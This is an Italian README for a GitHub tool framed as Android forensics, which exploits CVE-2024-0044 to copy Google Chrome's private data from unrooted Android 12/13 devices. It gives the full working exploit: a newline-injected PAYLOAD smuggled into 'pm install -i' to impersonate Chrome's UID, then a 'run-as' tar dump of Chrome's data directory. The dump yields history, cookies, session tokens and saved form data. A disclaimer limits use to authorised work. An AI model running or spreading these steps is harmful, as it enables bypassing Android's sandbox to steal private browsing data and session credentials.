
Un robusto strumento di digital forensics per l'estrazione e l'analisi degli artefatti di Google Chrome da dispositivi Android.
Un robusto strumento di digital forensics per estrarre e analizzare gli artefatti di Google Chrome da dispositivi Android
Funzionalità • Installazione • Utilizzo • Documentazione
Autore: JackTekno
GitHub: github.com/JackTekno
Questo strumento sfrutta la vulnerabilità CVE-2024-0044 (Run-as) per bypassare le restrizioni di autorizzazione su dispositivi Android 12/13 non rooted, consentendo l'estrazione forense dei dati di Google Chrome. Lo strumento analizza i database SQLite grezzi e genera rapporti di analisi completi.

Flusso di lavoro completo dell'analisi forense, dall'acquisizione alla generazione del report
Lo strumento genera un report Excel completo (result_chrome_forensic.xlsx) con i seguenti fogli:
F-Droid.apk)Clona il repository
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
Installa le dipendenze
pip install -r requirements.txt
# Invia un APK fittizio nella cartella temporanea
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Esempio di output: package:com.android.chrome uid:10129
# Annota l'UID (es. 10129)
⚠️ Sostituisci
10129con il tuo UID effettivo di Chrome dal Passo 3
adb shell
# All'interno della shell ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Attiva il package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Ancora all'interno della shell ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Esci dalla shell ADB
exit
adb pull /data/local/tmp/chrome.tar .
Estrai il file 'chrome.tar' nella cartella del progetto. Non è necessario spostare i file manualmente. Lo script Python troverà automaticamente i file di database all'interno delle cartelle estratte.
tar -xf chrome.tar
Esegui lo strumento di analisi forense:
python3 chrome_forensic.py
Lo strumento analizzerà i file di database e genererà result_chrome_forensic.xlsx nella stessa directory.
⚠️ IMPORTANTE: Questo strumento è progettato esclusivamente per scopi educativi e di analisi forense autorizzata.
- Utilizzalo solo su dispositivi di tua proprietà o per i quali hai esplicita autorizzazione scritta.
- L'accesso non autorizzato a dispositivi digitali potrebbe violare le leggi della tua giurisdizione.
- Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.
I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.
Questo progetto è concesso in licenza secondo la GNU General Public License v3.0. Vedi il file LICENSE per i dettagli.
Il proof of concept del metodo di acquisizione è stato riassunto e condiviso da Tinyhack.com.
Realizzato con ❤️ da JackTekno
⭐ Metti una stella • 🐛 Segnala un bug • 💡 Richiedi una funzionalità
| Nome foglio | Descrizione |
|---|
| 📖 Cronologia di navigazione | Sequenza temporale dettagliata degli URL visitati |
| 📈 Analytics – Siti principali | Classifica statistica dei domini più visitati |
| ⚠️ ALERT – Sospetti | URL contrassegnati automaticamente (hacking, droga, contenuti per adulti) |
| 📥 Download | Storico download con percorsi e dimensioni file |
| 🔍 Termini di ricerca | Query di ricerca dell'utente dalla barra degli indirizzi/Google |
| 🍪 Cookie e sessioni | Token di sessione e metadati dei cookie (crittografati in esadecimale) |
| ✍️ Dati di compilazione automatica | Dati dei moduli salvati (nomi, indirizzi, ecc.) |